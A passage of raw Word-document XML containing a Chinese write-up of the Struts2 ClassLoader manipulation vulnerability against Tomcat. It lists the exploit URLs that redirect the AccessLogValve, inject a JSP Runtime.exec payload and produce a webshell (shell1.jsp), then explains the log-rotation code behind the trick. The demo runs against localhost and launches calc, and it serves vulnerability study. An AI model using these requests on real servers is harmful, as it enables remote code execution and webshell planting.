          <w:t>http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问下面的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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>切换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（这里有个坑，这个属性必须是数字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里设定为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），那么从此开始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>access log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将被记录入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="88888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webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ROOT/shell1.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过发包访问下面的请求，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>access log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中植入代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://127.0.0.1/struts2-blank/example/aaaa.jsp?a=&lt;%Runtime.getRuntime().exec("calc");%</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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访问上述请求后，就可以看到生成了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webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ROOT/shell1.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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inherit" w:hAnsi="inherit" w:cs="Arial" w:hint="eastAsi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>
            <wp:extent cx="12603480" cy="1612900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://javaweb.org/wp-content/uploads/2014/04/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web.org/wp-content/uploads/2014/04/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48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EC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>结合前面设定的参数，访问下面的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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://127.0.0.1/shell1.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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inherit" w:hAnsi="inherit" w:cs="Arial" w:hint="eastAsi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>
            <wp:extent cx="12128500" cy="4598035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://javaweb.org/wp-content/uploads/2014/04/2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avaweb.org/wp-content/uploads/2014/04/2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EC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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通过分析，上面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中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class.classLoader.resources.context.parent.pipeline.first</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个属性实际是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org.apache.catalina.valves.AccessLogValve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在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conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/server.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面有一段相关的配置：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&lt;!--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Access log processes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allexample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.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Documentation at:/docs/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config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/valve.html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lastRenderedPageBreak/>
        <w:t>     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Note: The pattern used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isequivalent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to using pattern="common" --&gt;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&lt;ValveclassName="org.apache.catalina.valves.AccessLogValve"directory="logs"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prefix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="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localhost_access_log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"</w:t>
      </w:r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suffix=".txt"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pattern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="%h %l %u %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t&amp;quot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;%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r&amp;quot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; %s %b"</w:t>
      </w:r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/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00E413A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为何修改了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dataformat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会触发切换日志呢？注意下面一个属性，默认是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00E413A6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.class.classLoader.resources.context.parent.pipeline.first.rotatable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00E413A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时，都会调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rotate: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publicvoid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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log(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CharArrayWriter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message)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rotate(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888888"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00E413A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rotate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是检查当前的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>systime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>经过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后，与当前的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tsDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是否相同。如果日期不同了，自然需要切换日志文件了：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this.rotatable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long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systime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=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System.currentTimeMillis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systime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-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this.rotationLastChecked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&gt; 1000L)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synchronized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(this) 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systime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-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this.rotationLastChecked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&gt; 1000L) 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this.rotationLastChecked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=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systime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String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tsDate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=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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this.fileDateFormatter.format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new</w:t>
      </w:r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Date(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systime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if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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(!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this.dateStamp.equals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(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tsDate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)){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close(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true);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  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this.dateStamp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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spell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tsDate</w:t>
      </w:r>
      <w:proofErr w:type="spell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  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);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Pr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="231" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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而我们之前已经修改了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dateFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，所以就触发了日志切换。这个特性与具体的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无关，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码决定的。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下证实该问题均存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after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Fonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>后记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="96" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
